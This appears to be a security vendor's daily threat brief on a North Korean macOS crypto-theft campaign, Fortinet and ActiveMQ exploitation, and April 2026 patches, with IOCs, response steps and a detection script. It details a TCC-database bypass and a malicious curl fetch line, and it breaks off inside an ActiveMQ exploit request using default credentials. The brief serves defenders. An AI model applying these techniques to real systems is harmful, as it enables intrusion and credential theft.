DAILY-2026-0417
Critical
Active Exploitation Confirmed

Perimeters on Fire: DPRK Hits macOS Wallets, Fortinet Burns, and Microsoft Ships Its Heaviest Patch Tuesday of 2026

North Korean state actor Sapphire Sleet is running a live macOS campaign stealing cryptocurrency and credentials from finance and tech professionals. Simultaneously, CISA confirmed active exploitation of Apache ActiveMQ (CVE-2026-34197) and Fortinet management infrastructure, while Microsoft's April 2026 Patch Tuesday shipped 167 fixes including two actively exploited zero-days. Immediate action required across all five clusters.

CVSS Score: 9.8 | IOC Count: 24 | Source Count: 13 | Confidence Score: 84


Chapter 01 - Executive Overview

Today's brief covers five concurrent threat clusters that together represent the most concentrated single-day risk event of April 2026. Three require immediate action before the weekend. Two require accelerated patching this week. One — Sapphire Sleet — has already stolen cryptocurrency from targets and offers no recovery path once assets are gone.

Cluster A — Sapphire Sleet macOS Campaign

Severity: Critical | Sectors: Crypto, VC, Finance, Tech | Attribution: High

A North Korean state actor — Sapphire Sleet — is actively running a macOS campaign targeting cryptocurrency holders, venture capital professionals, blockchain developers, and finance employees. The attack begins with a fake recruiter on LinkedIn, ends with a 575-line AppleScript exfiltrating nine categories of sensitive data including cryptocurrency wallet keys, Telegram sessions, browser credentials, SSH keys, and Apple Notes — and does so without exploiting a single software vulnerability.

The actor exploits human trust, not software flaws. A fabricated job interview requires the target to install a "Zoom SDK Update" — which is actually a malicious script file. Once opened, the attack is fully automated. macOS security controls (Gatekeeper, TCC, notarization) are bypassed because the script runs inside Apple's own Script Editor application. There is no prompt. There is no warning. The attack completes silently.

What makes this irreversible: Stolen cryptocurrency private keys and wallet seeds cannot be invalidated or recovered. Unlike a password breach, there is no "change credentials" option. Once wallet keys are exfiltrated, associated funds are at permanent risk.

What leadership must decide today: Any organization whose employees hold cryptocurrency, access DeFi platforms, manage client crypto assets, or work in blockchain/VC must immediately verify that macOS endpoint protection is deployed, current, and actively detecting. This is not a wait-and-patch situation. The campaign is live. Microsoft has published IOCs. Apple has deployed protections. Your endpoint must be updated to benefit.

Cluster B — Fortinet FortiCloud SSO & FortiClient EMS

Severity: Critical | Sectors: Enterprise, MSPs, Government | Attribution: Unattributed

Since January 2026, unknown attackers have exploited a critical authentication bypass in Fortinet's FortiCloud SSO service (CVE-2026-24858) to log into customer firewalls without valid credentials, create rogue administrator accounts, and modify network security configurations — even on devices running fully patched firmware at the time. Fortinet temporarily shut down FortiCloud SSO globally on January 26 to contain exploitation.

Separately, CISA's KEV catalog confirms that Fortinet FortiClient EMS — the platform many organizations use to manage endpoint security policies — carries a CVSS 9.1 SQL injection vulnerability (CVE-2026-21643) under active exploitation. The FCEB patch deadline was April 16, 2026 — yesterday.

What leadership must decide today: Any environment using FortiCloud SSO that has not upgraded to fixed firmware must disable FortiCloud SSO immediately and audit administrative accounts for unauthorized additions. Any environment running FortiClient EMS must confirm patching status and restrict external access to the management interface.

Cluster C — Apache ActiveMQ CVE-2026-34197

Severity: Critical | Sectors: Enterprise, Finance, Healthcare, Government | Attribution: Unattributed

CISA added CVE-2026-34197 to the Known Exploited Vulnerabilities catalog today (April 17, 2026). Apache ActiveMQ — a foundational enterprise messaging broker used in data pipelines, integration middleware, and ESB architectures — has a remote code execution vulnerability that attackers are actively exploiting. The flaw has existed in the codebase for over 13 years.

In many real-world deployments, the default admin:admin credential is never changed, making this vulnerability functionally unauthenticated. An attacker can send a crafted request to the Jolokia JMX management API and execute arbitrary operating system commands on the broker's host. From a compromised broker, attackers can access connected data pipelines, backend databases, and internal systems. FCEB patch deadline: April 30, 2026.

What leadership must decide today: Security teams must identify all ActiveMQ instances in the environment, block external access to Jolokia endpoints at the perimeter, audit for default credentials, and begin upgrade to 5.19.4 or 6.2.3 within 24 hours.

Cluster D — Microsoft April 2026 Patch Tuesday (167 Vulnerabilities)

Severity: Critical/High | Sectors: All enterprise | Attribution: Partial

Microsoft's largest Patch Tuesday of 2026 addresses 167 vulnerabilities. Four require immediate attention:

  • CVE-2026-32201 (SharePoint Server) — actively exploited zero-day. Spoofing via improper input validation. CISA KEV confirmed.

  • CVE-2026-33824 (Windows IKE, CVSS 9.8) — unauthenticated remote code execution. Potentially wormable across IPSec-enabled networks. No user interaction required.

  • CVE-2026-33825 (Microsoft Defender EoP) — actively exploited zero-day. Post-initial-access privilege escalation to SYSTEM.

  • CVE-2023-21529 (Exchange Server) — KEV-listed. Weaponized by Storm-1175 (China-nexus) to deliver Medusa ransomware. FCEB deadline: April 27, 2026.

What leadership must decide today: Approve emergency patching windows for SharePoint, Windows IKE, and Defender this weekend. CVE-2026-33824 is CVSS 9.8 and potentially wormable — in environments where patching is delayed, firewall rules blocking external IKEv2 must be applied immediately.

Cluster E — Google Chrome Skia & V8 Zero-Days

Severity: High | Sectors: All (universal browser surface) | Attribution: Unattributed

CISA has added CVE-2026-3909 (Chrome Skia — out-of-bounds write) and CVE-2026-3910 (Chrome V8 — memory corruption) to KEV following Google's confirmation of active in-the-wild exploitation. Both carry CVSS 8.8. Exploitation requires only that a user visits a malicious webpage. Combined with social engineering — a tactic Sapphire Sleet uses extensively — browser exploitation is a reliable initial access vector on any unpatched endpoint.

What leadership must decide today: Push Chrome/Chromium updates to all managed endpoints immediately. Enforce browser restart policies so the update takes effect.

Chapter 02 - Threat & Exposure Analysis

Cluster A — Sapphire Sleet macOS: Full Attack Chain

Actor Identity

Sapphire Sleet is a North Korean state-sponsored group, tracked as UNC1069 by Google Mandiant/GTIG, Alluring Pisces by Unit 42/SentinelOne, and BlueNoroff by Kaspersky (supplemental source only). Microsoft Threat Intelligence (T1-03) is the primary attribution source for this campaign. The group has been active since at least March 2020 and is assessed as a DPRK revenue-generation operation — cryptocurrency theft funds regime activities. Google GTIG corroborates the same actor cluster via the March 31, 2026 npm supply chain incident (package live for ~3 hours before removal; observed timestamp: 2026-03-31T00:21Z).

Lure & Initial Access (T1566, T1204.002)

The actor creates fake recruiter personas on LinkedIn and professional networking platforms. Targets — primarily cryptocurrency professionals, VC employees, blockchain developers, and tech sector workers — receive job offers. The "technical interview" requires installation of a Zoom SDK Update. The delivered file is a compiled AppleScript (.scpt) named Zoom SDK Update.scpt.

When a target opens this file in macOS Script Editor (a trusted, Apple-signed application), execution begins. Because it originates from a user-initiated, Apple-signed context, macOS Gatekeeper and notarization controls do not trigger. The quarantine attribute is present — but Script Editor's trusted status means the operating system proceeds.

Execution Chain: Five-Stage AppleScript Cascade (T1059.002)

After thousands of blank lines and a decoy Zoom documentation comment block, the script proceeds through the following stages:

  1. Stage 0 (Lure file): Calls /usr/sbin/softwareupdate with invalid parameters as a visual decoy — a real Apple binary running in the foreground to reassure the target. Simultaneously launches curl to fetch Stage 1 from C2.

  2. Stage 1 (mac-cur1): Fetched AppleScript piped directly to osascript via run script result — no disk write. Deploys com.apple.cli (host monitor, C2 registration) and services binary (primary backdoor + persistence installer).

  3. Stage 2 (mac-cur2): Deploys credential-harvesting component via mac-cur4 (systemupdate.app download).

  4. Stage 3 (mac-cur3): Executes TCC bypass, full data collection, and 575-line exfiltration AppleScript.

  5. Stage 4 (mac-cur4): Downloads and installs systemupdate.app ZIP.

  6. Stage 5 (mac-cur5): Downloads decoy softwareupdate.app to present a completion dialog and close the social engineering loop.

Each stage uses a distinct curl user-agent for campaign tracking: mac-cur1, mac-cur2, mac-cur3, mac-cur4, mac-cur5, audio, beacon.

TCC Bypass — Defense Evasion (T1562.001)

macOS's Transparency, Consent, and Control (TCC) framework protects sensitive resources. The actor's bypass abuses the fact that Finder holds Full Disk Access (FDA) by default:

  1. Finder is used to rename the com.apple.TCC directory (Finder's FDA permits this without a user prompt).

  2. The attacker copies TCC.db to a staging location.

  3. sqlite3 modifies the copy: a new entry grants /usr/bin/osascript AppleEvents permission to com.apple.finder (auth_value=2, auth_reason=3 — no user consent dialog triggered).

  4. The modified database replaces the original. Staging files are deleted.

Result: osascript can now control Finder and access any protected resource without triggering user consent prompts.

Credential Harvesting (T1056.002)

systemupdate.app presents a pixel-perfect fake macOS password dialog. The captured password is validated via dscl -authonly before exfiltration — only valid credentials are sent. Validated credentials are transmitted immediately to the Telegram Bot API (api.telegram.org/bot*) on port 443, blending into legitimate HTTPS traffic.

Data Exfiltration — Nine Categories (T1539, T1555.001, T1041)

The 575-line AppleScript (mac-cur3) stages and uploads nine zip archives:

Archive Pattern    | Contents
tapp_*.zip         | Telegram session data
ext_*.zip          | Browser profiles, credentials, cookies (Chrome, Brave, Arc)
ldg_*.zip          | Ledger hardware wallet data
exds_*.zip         | Exodus wallet
hs_*.zip           | SSH keys, shell history
nt_*.zip           | Apple Notes database
Crypto extensions  | Sui, Phantom, TronLink, Coinbase, OKX, Solflare, Rabby, Backpack, Bitwarden
Keychain           | macOS Keychain database
System logs        | Diagnostic logs

All archives upload to C2 on port 8443 using a published upload authorization token (fwyan48umt1vimwqcqvhdd9u72a7qysi — published by Microsoft, do not use as an operational IOC; treat as campaign artifact for detection reference).

Persistence — LaunchDaemon (T1547.011)

com.google.webkit.service.plist is installed under /Library/LaunchDaemons/ — system-level, survives reboots, runs before user login. It launches icloudz — the primary backdoor — disguised as a legitimate Google service.

Reflective Loading — In-Memory Mach-O (T1055)

icloudz uses Apple's NSCreateObjectFileImageFromMemory API to load Mach-O payloads directly from C2 into memory. No file is written to disk. This defeats file-based detection and forensic artifact recovery.

Tertiary Backdoor (T1041)

com.google.chromes.updaters — a third backdoor installed to ~/Library/Google/ — runs a 60-second beacon loop connecting to check02id[.]com on port 5202. It operates independently of the primary C2 cluster, providing infrastructure redundancy.

Cluster B — Fortinet: Management Plane Takeover

CVE-2026-24858 — FortiCloud SSO Authentication Bypass

Fortinet's FortiCloud SSO service, used for administrative login to FortiOS, FortiManager, and FortiAnalyzer devices, contained an alternate authentication path (CWE-288) that failed to properly isolate tenant context. Attackers with any FortiCloud account and a registered device could authenticate to other customers' devices. The exploit created local administrator accounts directly on FortiGate firewalls — even on devices with prior SSO vulnerabilities (CVE-2025-59718/59719) already patched.

Shadowserver telemetry confirms externally exposed FortiCloud SSO instances dropped from over 26,000 in late December 2025 to fewer than 10,000 by late January 2026 — reflecting Fortinet's global SSO disable on January 26. Approximately 10,000 instances remain potentially exposed where patching is incomplete.

CVE-2026-21643 & CVE-2026-35616 — FortiClient EMS RCE

FortiClient EMS — the centralized endpoint policy management platform — accepts crafted HTTP requests from unauthenticated attackers. CVE-2026-21643 is SQL injection (CVSS 9.1) enabling arbitrary command execution. CVE-2026-35616 is improper access control enabling unauthenticated code execution. Both are CISA KEV-listed. FCEB deadline for CVE-2026-21643: April 16, 2026 — already past.

Strategic Risk: A compromised FortiClient EMS server gives an attacker control over endpoint security policies across the entire managed fleet. Combined with FortiCloud SSO takeover of firewalls, a single threat actor can simultaneously disable endpoint protection and modify network security rules — a complete security architecture bypass.

Cluster C — Apache ActiveMQ CVE-2026-34197: Jolokia JMX-HTTP RCE

ActiveMQ's Jolokia JMX-HTTP bridge, exposed by default at /api/jolokia/ on the web console, provides a REST-to-JMX interface. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector() and BrokerService.addConnector().

An attacker supplies a crafted discovery URI to these methods. The URI's brokerConfig parameter directs the VM transport to load a remote Spring XML application context via ResourceXmlApplicationContext. Spring instantiates all declared singleton beans before ActiveMQ validation runs — creating an injection window during which bean factory methods (e.g., Runtime.exec()) execute arbitrary OS commands as the ActiveMQ service account.

Default Credential Amplification: The majority of production ActiveMQ deployments use default admin:admin credentials, making this functionally unauthenticated in real-world environments. On versions 6.0.0–6.1.1, a chained flaw (CVE-2024-32114) makes this explicitly unauthenticated.

Attack surface: Any enterprise running ActiveMQ with an externally accessible Jolokia endpoint — regardless of whether the console is "internal" — is directly exposed. ActiveMQ is embedded in many enterprise integration frameworks and may not appear in standard asset inventories.

Cluster D — Microsoft Patch Tuesday: Critical Subset

CVE-2026-33824 (Windows IKE, CVSS 9.8): Unauthenticated RCE via crafted IKEv2 packets. No user interaction required. Microsoft and ZDI describe the exploitation path as potentially wormable across IPSec-enabled networks — meaning a single compromised host could propagate exploitation to adjacent systems without any additional user action.

CVE-2026-32201 (SharePoint, CVSS 6.5): Improper input validation enables network-based spoofing. Microsoft confirms active exploitation ("Exploitation Detected"). Specific exploitation chain is not publicly disclosed; impact includes unauthorized information access and potential data modification in SharePoint-hosted content.

CVE-2026-33825 (Defender EoP, CVSS 7.8): Zero-day, actively exploited. Post-initial-access privilege escalation to SYSTEM. Remediated by Defender Antimalware Platform update v4.18.26050.3011, auto-distributed to environments with automatic updates enabled.

CVE-2023-21529 (Exchange Server RCE — KEV): Microsoft attributes weaponization of this flaw to Storm-1175 (China-nexus, financially motivated) for delivery of Medusa ransomware. FCEB deadline: April 27, 2026.

Cluster E — Chrome Skia/V8 (CVE-2026-3909, CVE-2026-3910)

CVE-2026-3909 (Skia, CVSS 8.8): Out-of-bounds write via crafted HTML rendering, enabling memory corruption and arbitrary code execution within the browser renderer process. CVE-2026-3910 (V8, CVSS 8.8): Memory corruption via malicious JavaScript/WebAssembly. Google confirmed active exploitation at patch release (March 12–13, 2026). Attack requires only that a user visits a malicious webpage — no download, no prompt, no extension required.

Cross-Cluster Pattern: Two Themes Dominating April 2026

Theme 1 — Management plane as kill chain entry: Fortinet EMS manages endpoint security. FortiCloud SSO controls firewall administration. ActiveMQ brokers enterprise data pipelines. All three are management-layer components. Compromising any one of them provides disproportionate lateral movement capability. Attackers in April 2026 are consistently targeting systems that control other security systems — a deliberate architectural targeting pattern.

Theme 2 — Social engineering replaces zero-days: Sapphire Sleet's macOS campaign deliberately avoids software exploitation. By staying within user-initiated, Apple-signed application contexts, the actor bypasses all technical security controls and makes the attack's success entirely dependent on human behavior. This is not a coincidence — zero-days carry operational cost and burn rate. Reliable social engineering is cheaper and more scalable. This trend will continue.

Chapter 03 - Operational Response

PRIORITY ORDER — TODAY

Priority | Cluster                                   | Action                                                      | Deadline
1        | Sapphire Sleet macOS                      | Hunt IOCs, verify macOS EDR, alert crypto/finance staff     | Immediate
2        | Fortinet FortiCloud SSO (CVE-2026-24858)  | Disable SSO on unpatched devices, audit admin accounts      | Immediate
3        | Fortinet FortiClient EMS (CVE-2026-21643) | Block external access, patch — FCEB deadline was yesterday  | Immediate
4        | Apache ActiveMQ CVE-2026-34197            | Block Jolokia externally, change default creds, patch       | Within 24h
5        | SharePoint CVE-2026-32201                 | Apply April 2026 patches, restrict admin interfaces         | Within 24h
6        | Windows IKE CVE-2026-33824                | Patch or apply firewall mitigation immediately              | Within 24h
7        | Defender EoP CVE-2026-33825               | Confirm Defender auto-update; apply platform update         | Within 24h
8        | Chrome CVE-2026-3909/3910                 | Push browser update across managed fleet                    | Within 24h
9        | Exchange CVE-2023-21529                   | Patch — FCEB deadline April 27, 2026                        | This week

Cluster A — Sapphire Sleet macOS Response

DO NOW:

  1. Verify Microsoft Defender for Endpoint on Mac (or equivalent EDR) is deployed, active, and updated on all macOS endpoints in crypto, finance, VC, and technology environments. Apple has deployed XProtect signatures — macOS must be current to receive them.

  2. Run the following threat hunt queries against last 30 days of macOS endpoint telemetry (see Chapter 4 for full KQL/SIGMA):

    • curl user-agents: mac-cur1 through mac-cur5, audio, beacon

    • File paths: ~/.zoom.log, ~/Library/Application Support/iCloud/icloudz, ~/Library/Google/com.google.chromes.updaters, /Library/LaunchDaemons/com.google.webkit.service.plist

    • Network connections to: *.webzoom[.]us, check02id[.]com, 83.136.208.0/22, 188.227.196.252

  3. Alert employees in crypto, finance, developer, and VC roles: Warn explicitly about fake recruiter approaches delivering Zoom "SDK updates." Provide the exact lure pattern (.scpt files opened in Script Editor).

WITHIN 24 HOURS:

  • Query email and collaboration logs for outbound connections to api.telegram.org/bot* from macOS endpoints.

  • Block *.webzoom.us and check02id.com at DNS and perimeter firewall.

  • Block outbound port 5202 from workstations at the firewall level.

  • Apply MDM policy restricting execution of .scpt files downloaded from the internet (quarantine attribute present).
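A hunt over macOS endpoint telemetry for the indicators listed in the DO NOW and WITHIN 24 HOURS items above, as an added example that is not part of the original brief or of Microsoft's published KQL. The key=value telemetry format and the sample lines are constructed (placeholder IPs and a placeholder bot token); the indicator values themselves are the ones this brief lists.

```python
"""Hunt the Sapphire Sleet macOS indicators listed in this brief.

Added example, not code from the original report or from Microsoft.
Telemetry is constructed inline in a key=value format; real input would be
EDR/SIEM exports. The indicator values are the ones this brief lists.
"""
import ipaddress
import re
from fnmatch import fnmatch

# Per-stage curl user-agents the actor uses for campaign tracking.
USER_AGENTS = {"mac-cur1", "mac-cur2", "mac-cur3", "mac-cur4", "mac-cur5", "audio", "beacon"}
# Implant and persistence paths (user paths normalised to ~/ below).
PATHS = {
    "~/.zoom.log",
    "~/Library/Application Support/iCloud/icloudz",
    "~/Library/Google/com.google.chromes.updaters",
    "/Library/LaunchDaemons/com.google.webkit.service.plist",
}
DOMAINS = ("*.webzoom.us", "check02id.com")
NETWORKS = (ipaddress.ip_network("83.136.208.0/22"), ipaddress.ip_network("188.227.196.252/32"))
BEACON_PORT = 5202  # tertiary backdoor beacon port

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_HOME = re.compile(r"^/Users/[^/]+/")


def parse(line):
    """Parse 'k=v k="quoted v"' telemetry into a dict; the first token is the timestamp."""
    fields = {"ts": line.split(" ", 1)[0]}
    for key, quoted, bare in _KV.findall(line):
        fields[key] = quoted if quoted else bare
    return fields


def match_event(ev):
    """Return the indicator category an event matches, or None."""
    kind = ev.get("event")
    if kind == "process":
        # curl stages are tagged with a per-stage user-agent via -A / --user-agent
        tokens = ev.get("cmdline", "").split()
        for i, tok in enumerate(tokens[:-1]):
            if tok in ("-A", "--user-agent") and tokens[i + 1] in USER_AGENTS:
                return "curl_user_agent:" + tokens[i + 1]
    elif kind == "file":
        path = _HOME.sub("~/", ev.get("path", ""))  # /Users/<user>/... -> ~/...
        if path in PATHS:
            return "file_path:" + path
    elif kind == "network":
        host = ev.get("dst_host", "")
        if any(fnmatch(host, pat) for pat in DOMAINS):
            return "domain:" + host
        # Telegram Bot API is the credential exfiltration channel
        if host == "api.telegram.org" and ev.get("url", "").startswith("/bot"):
            return "telegram_bot_api"
        ip = ev.get("dst_ip")
        if ip and any(ipaddress.ip_address(ip) in net for net in NETWORKS):
            return "c2_ip:" + ip
        if ev.get("dst_port") == str(BEACON_PORT):
            return "beacon_port:" + ev["dst_port"]
    return None


def hunt(lines):
    """Return (timestamp, host, category) for every line that hits an indicator."""
    hits = []
    for line in lines:
        ev = parse(line)
        category = match_event(ev)
        if category:
            hits.append((ev["ts"], ev.get("host", "?"), category))
    return hits


# Constructed sample telemetry: three benign lines and six that hit indicators.
# 203.0.113.x addresses and the bot token are placeholders, not real indicators.
SAMPLE = [
    '2026-04-16T09:12:03Z host=mac-042 user=alice event=process image=/usr/bin/curl cmdline="curl -s -A mac-cur1 https://cdn.webzoom.us/s1"',
    '2026-04-16T09:12:04Z host=mac-042 user=alice event=process image=/usr/sbin/softwareupdate cmdline="softwareupdate --install --force"',
    '2026-04-16T09:12:09Z host=mac-042 user=alice event=file op=create path="/Users/alice/Library/Application Support/iCloud/icloudz"',
    '2026-04-16T09:12:10Z host=mac-042 user=alice event=file op=create path=/Users/alice/Library/Caches/com.apple.Safari/fsCachedData/x',
    '2026-04-16T09:12:11Z host=mac-042 user=root event=file op=create path=/Library/LaunchDaemons/com.google.webkit.service.plist',
    '2026-04-16T09:13:00Z host=mac-042 user=alice event=network dst_host=api.telegram.org dst_ip=203.0.113.5 dst_port=443 url=/botPLACEHOLDER_TOKEN/sendDocument',
    '2026-04-16T09:13:30Z host=mac-042 user=alice event=network dst_host=github.com dst_ip=203.0.113.6 dst_port=443 url=/',
    '2026-04-16T09:14:00Z host=mac-042 user=alice event=network dst_ip=83.136.209.17 dst_port=8443 url=/upload',
    '2026-04-16T09:15:00Z host=mac-042 user=root event=network dst_host=check02id.com dst_ip=203.0.113.7 dst_port=5202',
]

if __name__ == "__main__":
    for ts, host, category in hunt(SAMPLE):
        print(ts, host, category)
```

Feed it the lines of an EDR export in the same key=value shape (or adapt parse() to the export's schema); a hit on any category warrants the incident steps listed under IF INCIDENT CONFIRMED.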

IF INCIDENT CONFIRMED:

  • Preserve ~/Library/ directory, LaunchDaemon plists, and any .scpt files before any remediation — do not wipe before imaging.

  • Escalate immediately: assume cryptocurrency assets and all stored credentials on the affected device are compromised.

  • Notify affected user's financial accounts, crypto exchange accounts, and Telegram contacts.

Cluster B — Fortinet Response

DO NOW:

  1. Identify all Fortinet FortiOS, FortiManager, FortiAnalyzer devices with FortiCloud SSO enabled. For any not running fixed firmware (FortiOS 7.4.11 or vendor-specified patched branch): disable FortiCloud SSO immediately.

  2. Identify all FortiClient EMS instances. Block external network access to EMS management interfaces if not already restricted to VPN/management network only.

  3. Audit all Fortinet administrative accounts created since January 20, 2026. Any account not recognized should be treated as attacker-created.

WITHIN 24 HOURS:

  • Apply Fortinet patches for CVE-2026-24858, CVE-2026-21643, and CVE-2026-35616 across all affected deployments.

  • Enable and centralize Fortinet admin event logging (auth, config change, SSO session logs) if not already forwarded to SIEM.

  • Review configuration changes made via SSO sessions since January 2026 — specifically firewall rules, routing tables, and administrative policies.

IF INCIDENT CONFIRMED:

  • Preserve Fortinet event and config logs before any changes.

  • Treat any modified firewall ruleset as potentially attacker-controlled.

  • Notify SOC, IR, and customer-facing teams if managed service environments are affected. MSPs: notify impacted customers immediately.

Cluster C — Apache ActiveMQ Response

DO NOW:

  1. Enumerate all Apache ActiveMQ instances in the environment — including those embedded in middleware, ESB, and integration frameworks that may not appear in standard CMDB entries.

  2. Identify any Jolokia endpoints (/api/jolokia/) accessible from external networks or untrusted internal segments. Block immediately at WAF and perimeter firewall.

  3. Audit all ActiveMQ instances for default credentials (admin:admin). Change all instances of default credentials immediately.

WITHIN 24 HOURS:

  • Upgrade to Apache ActiveMQ 5.19.4 or 6.2.3.

  • For versions 6.0.0–6.1.1: treat as P0 (unauthenticated exploitation via CVE-2024-32114 chain) — isolate from network if patching is delayed.

  • Disable Jolokia entirely where not operationally required. If required, restrict via jolokia-access.xml to trusted management IPs only.

  • Enable ActiveMQ audit logging to capture JMX/Jolokia API calls.

IF EXPLOITATION SUSPECTED:

  • Preserve ActiveMQ logs (/data/activemq.log) before changes.

  • Check for unexpected Java child process creation (e.g., sh, bash, cmd, powershell) spawned by the ActiveMQ service account.

  • Isolate the broker from connected data pipeline systems pending forensic review.

Cluster D — Microsoft Patch Tuesday Response

DO NOW:

  1. Patch CVE-2026-32201 (SharePoint) — actively exploited zero-day. Prioritize internet-facing SharePoint instances.

  2. Confirm Defender Antimalware Platform version is at minimum 4.18.26050.3011 to address CVE-2026-33825 (actively exploited EoP zero-day).

  3. Apply emergency firewall mitigations for CVE-2026-33824 (Windows IKE, CVSS 9.8) on all VPN gateways and IPSec-enabled systems where patching cannot be completed today — block IKEv2 from untrusted external sources.

WITHIN 24 HOURS:

  • Patch CVE-2026-33824 and CVE-2026-33827 across all Windows Server and VPN gateway infrastructure.

  • Patch CVE-2026-33826 (Active Directory RCE) — lower immediate risk (requires adjacent network access) but High priority given AD's centrality.

  • Patch CVE-2023-21529 (Exchange Server) — KEV-listed, ransomware delivery confirmed, FCEB deadline April 27.

Cluster E — Chrome Response

DO NOW:

  1. Push Chrome/Chromium update to all managed endpoints via MDM/policy.

  2. Enforce browser restart policies — the update has no effect until applied.

  3. Prioritize privileged user workstations (admins, finance, HR, executive assistants) — these are highest-value targets for browser-based initial access.

SAPPHIRE SLEET macOS CAMPAIGN
══════════════════════════════════════════════════════════════════════
2020-03           Sapphire Sleet (UNC1069) first observed as active DPRK
                  state threat actor (Microsoft Threat Intelligence, T1-03)
[DATE UNKNOWN]    macOS Zoom SDK Update.scpt campaign begins
                  Exact campaign start not in available sources
2026-03-31T00:21Z Malicious npm package attributed to UNC1069 observed
                  in supply chain attack (Google GTIG, T1-06)
2026-03-31T03:20Z Malicious npm package removed from npm registry
                  (~3 hour window of exposure)
2026-04-15/16     Microsoft Threat Intelligence publishes full technical
                  disclosure: IOCs, attack chain, KQL queries, MITRE
                  mappings (Microsoft Security Blog, T1-03)
2026-04-16        Apple deploys XProtect signatures and Safari Safe Browsing
                  protections for Sapphire Sleet infrastructure and malware
2026-04-16        Dark Reading (T2-11) publishes public coverage
2026-04-17        Included in this report (window close: 3 PM IST)

FORTINET FORTICLOUD SSO (CVE-2026-24858)
══════════════════════════════════════════════════════════════════════
2025-12           >26,000 Fortinet instances exposing FortiCloud SSO
                  externally (Shadowserver telemetry via The Record, T2-09)
2026-01-20        First confirmed reports: unauthorized FortiGate access
                  and rogue admin account creation on patched firmware
                  (Fortinet PSIRT / Help Net Security)
2026-01-22        Fortinet disables malicious FortiCloud accounts actively
                  abusing CVE-2026-24858
2026-01-26        Fortinet globally disables FortiCloud SSO at service level
                  to block further exploitation while patches are developed
2026-01-27        FortiCloud SSO restored restricted to patched firmware
                  only; Fortinet PSIRT formally publishes CVE-2026-24858
                  advisory with affected versions and remediation guidance
2026-01-28/29     Third-party telemetry (Shadowserver, SOC Prime) reports
                  sharp decline in exposed FortiCloud SSO instances;
                  log review urgency communicated broadly
2026-04-17        ~10,000 Fortinet instances still potentially exposed
                  (Shadowserver); included in this report

FORTINET FORTICLIENT EMS (CVE-2026-21643 / CVE-2026-35616)
══════════════════════════════════════════════════════════════════════
2026-03-24        CISA KEV lists CVE-2026-21643 (CVSS 9.1, SQL injection)
                  and CVE-2026-35616 (improper access control)
                  Exploitation confirmed in the wild; FCEB deadline set
2026-04-13        Secondary reporting confirms exploitation attempts ongoing
                  against FortiClient EMS since late March 2026
2026-04-16        FCEB remediation deadline for CVE-2026-21643 PASSED
2026-04-17        Included in this report

APACHE ACTIVEMQ CVE-2026-34197
══════════════════════════════════════════════════════════════════════
~2013             Jolokia JMX-HTTP bridge vulnerability present in
                  ActiveMQ codebase (Horizon3.ai: "hiding in plain sight
                  for over 13 years")
2026-04-06        CVE-2026-34197 publicly disclosed; NVD entry published
                  CVSS 8.8 assigned; Horizon3.ai technical writeup published
2026-04-06        Fortiguard Labs IPS signature published for CVE-2026-34197
2026-04-13        SAFE Security reports threat actors actively scanning for
                  and exploiting exposed Jolokia endpoints on ActiveMQ
                  Classic deployments in the wild
2026-04-17        CISA adds CVE-2026-34197 to KEV catalog
                  FCEB patch deadline: April 30, 2026
2026-04-17        The Hacker News (T2-03) publishes KEV listing coverage
                  Included in this report

MICROSOFT APRIL 2026 PATCH TUESDAY + KEV WAVE
══════════════════════════════════════════════════════════════════════
[DATE UNKNOWN]    Storm-1175 (China-nexus) begins exploiting
                  CVE-2023-21529 (Exchange Server RCE) to deliver
                  Medusa ransomware (Microsoft Threat Intelligence, T1-03)
2026-03-24        Defused Cyber detects exploitation attempts against
                  CVE-2026-21643 (FortiClient EMS); earliest EMS
                  exploitation timestamp in available sources
2026-04-08/13     Microsoft releases April 2026 Patch Tuesday
                  167 vulnerabilities addressed; 8 Critical, 154 Important
                  Actively exploited zero-days: CVE-2026-32201 (SharePoint),
                  CVE-2026-33825 (Defender EoP)
                  Notable critical: CVE-2026-33824 (Windows IKE, CVSS 9.8),
                  CVE-2026-33827 (Windows TCP/IP, CVSS 8.1),
                  CVE-2026-33826 (Active Directory RCE)
2026-04-13        CISA adds 6 CVEs to KEV catalog:
                  CVE-2026-21643 (Fortinet EMS) deadline 16 Apr
                  CVE-2023-21529 (Exchange) deadline 27 Apr
                  CVE-2026-32201 (SharePoint) deadline 27 Apr
                  CVE-2026-35616 (Fortinet EMS) deadline 27 Apr
                  CVE-2020-9715 deadline 27 Apr
                  CVE-2012-1854 deadline 27 Apr
2026-04-14        ZDI publishes April 2026 Security Update Review (T1-19)
2026-04-14        Microsoft Security (@MsftSecIntel) confirms update
                  availability via X/Twitter
2026-04-14/15     Windows Server 2025 KB5082063 causes update installation
                  failures and BitLocker recovery prompts on some systems;
                  Microsoft publishes mitigation guidance (BleepingComputer)
2026-04-15        CCB Belgium advisory published covering Patch Tuesday
                  for EU enterprise context
2026-04-16        Cybersecurity Help Week in Review covers Patch Tuesday
                  and KEV additions
2026-04-17        CISA adds CVE-2026-34197 (Apache ActiveMQ); total KEV
                  additions in current wave: 7
                  Included in this report

GOOGLE CHROME CVE-2026-3909 / CVE-2026-3910
══════════════════════════════════════════════════════════════════════
2026-03-10        Google internally identifies Chrome Skia (CVE-2026-3909)
                  and V8 (CVE-2026-3910) vulnerabilities
2026-03-12/13     Google releases patches; confirms active in-the-wild
                  exploitation for both CVEs
                  CISA adds CVE-2026-3909 and CVE-2026-3910 to KEV
                  with mandatory remediation deadlines for FCEB
2026-04-17        Included in this report as active background risk

Chapter 04 - Detection Intelligence

CVE-2026-34197 — Apache ActiveMQ Jolokia JMX-HTTP RCE

Root cause: CWE-20 (Improper Input Validation) + CWE-94 (Code Injection)
Affected: activemq-broker / activemq-all < 5.19.4; versions 6.0.0–6.2.3 (excl. 6.2.3)
Fixed in: 5.19.4 and 6.2.3
CVSS v3.1: 8.8 (Network / Low Complexity / No User Interaction / Privileges Required: Low)
CISA KEV: Listed 2026-04-17 | FCEB deadline: 2026-04-30

The Jolokia JMX-HTTP bridge at /api/jolokia/ exposes exec operations on all ActiveMQ MBeans by default, including BrokerService.addNetworkConnector() and BrokerService.addConnector(). An attacker supplies a crafted discovery URI containing a brokerConfig parameter that directs the VM transport to load a remote Spring XML application context via ResourceXmlApplicationContext. Spring instantiates all declared singleton beans before ActiveMQ validation runs — creating a code injection window.

Proof-of-concept request structure (Horizon3.ai, contextual):

POST /api/jolokia/ HTTP/1.1
Host: target-activemq:8161
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/json

{
  "type": "exec",
